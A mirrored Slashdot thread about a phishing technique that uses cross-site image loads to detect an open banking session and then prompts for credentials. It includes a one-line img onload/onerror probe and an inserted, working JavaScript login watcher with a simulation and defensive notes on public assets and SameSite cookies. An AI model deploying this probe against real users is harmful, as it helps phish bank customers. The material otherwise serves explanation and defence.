Slashdot Mirror


Phishing For Bank Info Without Any Pesky Malware

Emb3rz writes "DarkReading.com brings us news of a new approach to phishing that targets online banking sites. Here's the novel part of it: it doesn't involve any of the typical attack vectors we all know and love. Instead, it uses JavaScript from a remote page to detect if you have a banking site open, and prompts you for info via popup if you do."

10 of 232 comments

  1. Re:XSS by AKAImBatman · · Score: 5, Insightful

    BTW, for those of you who are curious about this attack (and are too lazy to RTFA), this basically uses a common image set behind a protected login. e.g.

    <img src="https://www.mybank.com/protected/images/lock.gif" onerror="notLoggedInSoRefresh();" onload="hahaGotEm();">

    If you ping the blasted thing for long enough, you will be able to detect the user logging in. One pop-up later and you've stolen their info.

    Now protecting against this sort of issue is an interesting question. Ideally static resources should never be behind closed doors. But that answer is a bit of a cop-out. The next best thing is to ensure that session cookies are maintained inside the login tab ONLY and that persistent cookies are not used for auto-login.

    (Interesting question: I wonder if Chrome is vulnerable? With process isolation, this trick would require that the main Chrome process delegate the handling of session cookies. Which seems like a bad idea anyway, so I would hope they implemented the browser in a more secure manner.)
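
The probe the comment describes, as an added example (written for this page, not code from the article or from AKAImBatman's comment). It shows the attacker-side polling loop and, on the same code path, why serving the asset publicly removes the signal. The bank URL, the `Image` stand-in and the two server policies are constructed for the simulation.

```javascript
// Added example (written for this page, not code from the article or from
// AKAImBatman's comment): the login-detection probe described above, plus the
// server-side fix of serving the asset publicly. The bank URL is an assumption.

const PROTECTED_IMAGE = "https://www.mybank.com/protected/images/lock.gif"; // assumed URL

// One probe: load the protected image from a third-party page. If the victim's
// browser attaches a valid session cookie, the bank returns the GIF and onload
// fires; otherwise the bank answers with a login redirect or error page, which
// is not a decodable image, so onerror fires. No response body is ever read,
// so the same-origin policy does not block the signal.
function probeOnce(url, onResult, ImageCtor = globalThis.Image) {
  const img = new ImageCtor();
  img.onload = () => onResult(true);
  img.onerror = () => onResult(false);
  // Cache-busting query string so each probe is a fresh request.
  img.src = url + "?nocache=" + Date.now() + "-" + Math.random();
}

// Poll the probe and fire onLogin once, on the first not-logged-in -> logged-in
// transition (or immediately if the first probe already succeeds).
function createLoginWatcher(url, onLogin, ImageCtor = globalThis.Image) {
  let loggedIn = null; // unknown until the first probe completes
  let fired = false;
  function tick() {
    probeOnce(url, (loaded) => {
      if (loaded && !loggedIn && !fired) {
        fired = true;
        onLogin();
      }
      loggedIn = loaded;
    }, ImageCtor);
  }
  return {
    tick,
    start: (intervalMs = 2000) => setInterval(tick, intervalMs),
    isLoggedIn: () => loggedIn,
  };
}

// --- Offline simulation (constructed; lets the probe run without a browser) ---

// Two ways the bank could answer a request for the image. A policy returns
// true when the response is a decodable image.
const policies = {
  // Asset sits behind the login: only a valid session gets the GIF. Leaks state.
  protectedAsset: (hasSession) => hasSession,
  // Asset is public static content: everyone gets the GIF. Nothing to infer.
  publicAsset: () => true,
};

// Stand-in for the browser's Image object. Real browsers fire the handlers
// asynchronously; here they fire synchronously when src is assigned.
function makeFakeImage(session, policy) {
  return class FakeImage {
    set src(_url) {
      if (policy(session.cookie)) {
        if (this.onload) this.onload();
      } else if (this.onerror) {
        this.onerror();
      }
    }
  };
}

// Victim starts logged out, the attacker probes once, the victim logs in (in
// another tab), and the attacker probes twice more. Returns the observed events.
function runScenario(policy) {
  const session = { cookie: false };
  const events = [];
  const watcher = createLoginWatcher(
    PROTECTED_IMAGE, () => events.push("prompt"), makeFakeImage(session, policy));
  watcher.tick();
  events.push(watcher.isLoggedIn());
  session.cookie = true; // the victim logs in to the bank
  watcher.tick();
  watcher.tick(); // a second success must not prompt again
  events.push(watcher.isLoggedIn());
  return events;
}

// With the protected asset the prompt lands exactly when the login happens;
// with a public asset the probe succeeds regardless, so it carries no signal.
console.log("protected:", runScenario(policies.protectedAsset));
console.log("public:   ", runScenario(policies.publicAsset));
```

In a real page `watcher.start()` would drive `tick` from `setInterval`; the simulation calls `tick` directly so the sequence is deterministic. One caveat a practitioner should add today: the attack depends on the browser attaching the bank's session cookie to a cross-site image request, and browsers that default cookies to `SameSite=Lax` (or banks that set `SameSite` explicitly) withhold it, so the probe always sees the logged-out response. That defence did not exist when this thread was written.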

  2. Things to learn from this. by john.picard · · Score: 5, Insightful

    The next thing you know, they'll make up a screen scraper in JavaScript. There are several things to learn from this. For the users: one, that you should completely clear your browser (Clear Private Data or similar) before going to a banking website; two, that you should NEVER open other websites (or have them open) while you're signed in to a banking website; three, that when you've finished banking, you should completely clear your browser again. For the browser makers (Firefox devs reading this?), third-party cookies should be disabled by default, the option to turn them on should come with stern warnings, and each website can ONLY read cookies previously set by itself. Further, when an encrypted page is opened, its memory should be such that other pages cannot access any part of it. In other words, the same sandboxing approach taken to deal with other security issues, within the browser for encrypted pages.

  3. Re:Simple Solution... by X0563511 · · Score: 4, Insightful

    Once more, Darwin extends into the internet.

    Computers are tools. They do what they are told without question. The internet is made of computers. By extension, it is a tool that does exactly what it is told.

    Kind of like a handgun, and you don't (usually) let people run around with those without some kind of training.

    Also like a handgun, most tools don't care who is issuing the instructions - they just do it. That tablesaw doesn't care if it's a 2x4 or your forearm, it saws anyways.

    Yes, I'm an elitist bastard sometimes.

    --
    For large sets, this will be our guide even unto death, for the LORD will work for each type of data it is applied to...

  4. Re:The Best Defense is Offense by eln · · Score: 4, Insightful

    Some of us like to believe that the Constitution, as well as all other laws and treaties the government operates under, restricts the government's actions everywhere that it operates, not just on American soil, and that it also precludes the government from encouraging other nations to do what it itself is prohibited from doing. I don't see how we can call ourselves a just nation if we simply outsource acts that we would find deplorable if our own government were carrying them out.

    I don't deny that our government has had something of a bad history of clandestinely encouraging foreign powers to "disappear" people we find troublesome, but that doesn't make it right or legal, and it certainly doesn't mean we should encourage it to happen more often.

  5. A 'secure mode' for browsers? by dnwq · · Score: 4, Insightful

    Internet Explorer has a porn^H^H^H^H privacy mode where privacy settings are locked down. Why not build an analogous 'secure mode' for Firefox or Konq. where security settings are all locked to high heaven for that browsing session only?

    That way users can both bank online securely and not have half the web break for them because they've disabled javascript.

  6. Re:The article makes it sound so simple... by blueg3 · · Score: 4, Insightful

    You don't need to hack a high-profile site to put malicious JavaScript on there. Most high-profile sites, directly or indirectly, load tons of third-party objects.

    Advertising, for example, is an excellent JavaScript injection vector.

  7. paranoia-plus... by BrokenHalo · · Score: 5, Insightful

    My paranoia has led me into a practice of doing my banking in a single browser session, clearing cookies, cache and history before and after, and closing/restarting the browser when finished.

    Looks like I was right about the monsters behind the sofa after all.

    1. Re:paranoia-plus... by stranger_to_himself · · Score: 4, Insightful

      My paranoia has led me into a practice of doing my banking in a single browser session, clearing cookies, cache and history before and after, and closing/restarting the browser when finished.

      My paranoia has led me into a practice of doing my banking by going to the bank.

  8. Re:The Best Defense is Offense by N1AK · · Score: 5, Insightful

    Slashdot: Where fining people for copyright infringement is wrong but killing people for stealing login details is "Insightful".

  9. Re:The Best Defense is Offense by Muad'Dave · · Score: 4, Insightful

    Maybe "you" do, and you don't know it. I think it would be prudent to call BoA, tell them what you received, and make sure someone isn't laundering money using an account opened with your SSN, name, or address.

    --
    Tiller's Rule: Never use a word in written form that you've only heard and never read. You will end up looking foolish.